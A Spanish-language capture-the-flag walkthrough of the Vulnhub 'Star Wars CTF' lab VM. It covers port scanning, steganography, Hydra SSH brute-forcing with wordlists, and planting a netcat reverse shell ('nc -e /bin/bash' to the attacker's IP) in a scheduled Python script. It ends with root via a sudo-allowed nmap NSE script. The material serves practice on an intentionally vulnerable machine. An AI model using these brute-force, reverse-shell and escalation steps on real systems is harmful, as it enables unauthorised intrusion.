[VULNHUB] Star Wars CTF

Hoy vamos a hackear la maquina de Vulnhub llamada Star Wars CTF. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/star-wars-ctf-1,528/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.35 Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 12:37 CEST Nmap scan report for 192.168.1.35 Host is up (0.00067s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 4c:53:4d:b2:26:ee:a5:10:d4:be:99:84:2a:9a:aa:11 (RSA) | 256 95:d7:a4:e0:74:63:4b:08:b0:a8:8c:dc:e1:f8:91:25 (ECDSA) |_ 256 1d:07:d1:3d:99:02:f0:04:ba:23:c3:a4:fd:0d:3d:91 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.90 seconds
    En http://192.168.1.35/robots.txt aparece:
    Why does the Jedi Order keep checking the robots.txt file. Might take a look at /r2d2 He is the real OG.
    Visitamos http://192.168.1.35/r2d2 y podemos ver que hay mucho texto... Por otro lado nos descargamos las 2 imagenes que aparecen en la web inicial de http://192.168.1.35.
    ~ > wget http://192.168.1.35/yoda.jpg ~ > wget http://192.168.1.35/yoda.png
    Puede que contengan algo de stego, asi que buscamos en un buscador algo de "stego online"... Encontramos la siguiente web[1], y al pasarle la imagen yoda.png vemos que nos aparece que la autentica password es babyYoda123 pero no tenemos ningun login... Buscamos en google alguna wordlist de starwars y encontramos esta[2]. La descargamos, y la usaremos como diccionario de "logins" usando la password que hemos encontrado anteriormente. Lanzamos hydra!
    ~ > hydra -L starwars.txt -p babyYoda123 192.168.1.35 ssh -f Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 19:25:07 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 217 login tries (l:217/p:1), ~14 tries per task [DATA] attacking ssh://192.168.1.35:22/ [22][ssh] host: 192.168.1.35 login: han password: babyYoda123 [STATUS] attack finished for 192.168.1.35 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-10 19:25:20
    Obtenemos la password del usuario "han". Nos logueamos!
  • Low Shell
  • ~ > ssh han@192.168.1.35 han@192.168.1.35's password: Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Jul 23 08:18:42 2020 from ::1 han@starwars:~$ id uid=1000(han) gid=1000(han) groups=1000(han)
    Exploramos un poco el sistema...
    han@starwars:~$ ls -la total 32 drwxr-xr-x 4 han han 4096 Jul 23 08:11 . drwxr-xr-x 5 root root 4096 Jul 23 08:18 .. -rw------- 1 han han 483 Jul 24 20:42 .bash_history -rw-r--r-- 1 han han 220 Apr 18 2019 .bash_logout -rw-r--r-- 1 han han 3526 Apr 18 2019 .bashrc drwx------ 3 han han 4096 Jul 23 08:02 .gnupg -rw-r--r-- 1 han han 807 Apr 18 2019 .profile drwxr-xr-x 2 han han 4096 Jul 24 20:27 .secrets han@starwars:~$ cd .secrets han@starwars:~/.secrets$ ls -la total 12 drwxr-xr-x 2 han han 4096 Jul 24 20:27 . drwxr-xr-x 4 han han 4096 Jul 23 08:11 .. -rw-r----- 1 han han 22 Jul 24 20:28 note.txt han@starwars:~/.secrets$ cat note.txt Anakin is a cewl kid. han@starwars:~/.secrets$
    Vemos que hay una note.txt en el directorio .secrets. Utiliza 2 palabras interesantes: "Anakin" y "cewl". Podemos ver por un lado que el usuario skywalker pertenece al grupo "anakin".
    han@starwars:~/.secrets$ cat /etc/group anakin:x:2000:Darth,skywalker
    Por otro lado, vamos a usar la herramienta "cewl" que sirve para "preparar" diccionarios utilizando la web que hemos visto antes con tanto texto.
    cewl http://192.168.1.35/r2d2 > dic2.txt
    Una vez lo tenemos todo, usamos hydra para ver si obtenemos el password de skywalker con el diccionario que hemos hecho.
    ~ > hydra -l skywalker -P dic2.txt 192.168.1.35 ssh Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 19:31:18 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 328 login tries (l:1/p:328), ~21 tries per task [DATA] attacking ssh://192.168.1.35:22/ [22][ssh] host: 192.168.1.35 login: skywalker password: tatooine
    Lo tenemos :) Nos logueamos como skywalker.
    ~ > ssh skywalker@192.168.1.35 39s skywalker@192.168.1.35's password: Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Jul 24 20:09:34 2020 from 192.168.0.118 skywalker@starwars:~$ id uid=1001(skywalker) gid=1001(skywalker) groups=1001(skywalker),2000(anakin)
    Exploramos un poco el sistema.
    skywalker@starwars:~$ cd .secrets/ skywalker@starwars:~/.secrets$ ls note.txt skywalker@starwars:~/.secrets$ cat note.txt Darth must take up the job of being a good father
    Vemos que en la nota esta vez la palabra "interesante" es job. Seguimos explorando...
    skywalker@starwars:~/.secrets$ cd /home skywalker@starwars:/home$ ls Darth han skywalker skywalker@starwars:/home$ cd Darth skywalker@starwars:/home/Darth$ ls -la total 44 drwxr-xr-x 5 Darth Darth 4096 Jul 24 21:03 . drwxr-xr-x 5 root root 4096 Jul 23 08:18 .. -rw------- 1 Darth Darth 2351 Jul 24 22:33 .bash_history -rw-r--r-- 1 Darth Darth 220 Apr 18 2019 .bash_logout -rw-r--r-- 1 Darth Darth 3526 Apr 18 2019 .bashrc drwx------ 3 Darth Darth 4096 Jul 23 08:20 .gnupg -rw------- 1 Darth Darth 42 Jul 24 21:03 .lesshst drwxr-xr-x 3 Darth Darth 4096 Jul 24 19:43 .local -rw-r--r-- 1 Darth Darth 807 Apr 18 2019 .profile drwxr-xr-x 2 Darth Darth 4096 Jul 24 20:13 .secrets -rw-r--r-- 1 Darth Darth 66 Jul 24 19:43 .selected_editor skywalker@starwars:/home/Darth$ cd .secrets skywalker@starwars:/home/Darth/.secrets$ ls -la total 12 drwxr-xr-x 2 Darth Darth 4096 Jul 24 20:13 . drwxr-xr-x 5 Darth Darth 4096 Jul 24 21:03 .. -rwxrw-r-- 1 Darth anakin 105 Jul 24 20:10 evil.py
    Dentro del home de Darth, y dentro de la carpeta .secrets vemos que hay un script en python que se llama evil.py. Tenemos permisos de escritura sobre el, y con la pista de la nota anterior, seguramente sea un script que se ejecuta cada X tiempo. El contenido del script tiene:
    skywalker@starwars:/home/Darth/.secrets$ cat evil.py # Let the fear flow through you every single minute fear = 1 anger = fear hate = anger suffering = hate
    Lo modificamos para que no devuelva una reverse shell.
    skywalker@starwars:/home/Darth/.secrets$ cat evil.py import os os.system("nc -e /bin/bash 192.168.1.59 5555")
    Ponemos nc a la escucha...
    ~ > nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.59] from (UNKNOWN) [192.168.1.35] 34298
    Y al cabo de un momento.
    ~ > nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.59] from (UNKNOWN) [192.168.1.35] 34298 python -c 'import pty;pty.spawn("/bin/bash")' Darth@starwars:~$
  • Privilege Escalation
  • Ahora ya somos Darth! Miramos si podemos hacer algo con sudo.
    Darth@starwars:~$ sudo -l sudo -l Matching Defaults entries for Darth on starwars: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User Darth may run the following commands on starwars: (ALL) NOPASSWD: /usr/bin/nmap Darth@starwars:~$
    Podemos usar nmap. En este caso, nmap no acepta el parametro --interactive que podriamos utilizar para escalar privilegios. Lo que haremos sera crear un script ".nse" que se lo pasaremos a nmap y nos facilitara una shell. Creamos el script (en lua).
    Darth@starwars:/tmp$ echo "os.execute(\"/bin/sh\")" > b.nse
    Ejecutamos...
    Darth@starwars:~$ sudo nmap --script=/tmp/b.nse sudo nmap --script=/tmp/b.nse Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 09:20 EDT # id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • # cd /root # cat flag.txt .-. |_:_| /(_Y_)\ . ( \/M\/ ) '. _.'-/'-'\-'._ ': _/.--'[[[[]'--.\_ ': /_' : |::"| : '.\ ': // ./ |oUU| \.' :\ ': _:'..' \_|___|_/ : :| ':. .' |_[___]_| :.':\ [::\ | : | | : ; : \ '-' \/'.| |.' \ .;.' | |\_ \ '-' : | | \ \ .: : | | | \ | '. : \ | / \ :. .; | / | | :__/ : \\ | | | \: | \ | || / \ : : |: / |__| /| snd | : : :_/_| /'._\ '--|_\ /___.-/_|-' \ \ '-' I hope you liked it Padawan :) #
  • End
  • Y con esto ya seriamos root de la maquina. [1]https://stylesuxx.github.io/steganography/ [2]https://gist.github.com/bgilham/f1796d6eab8f283f64f4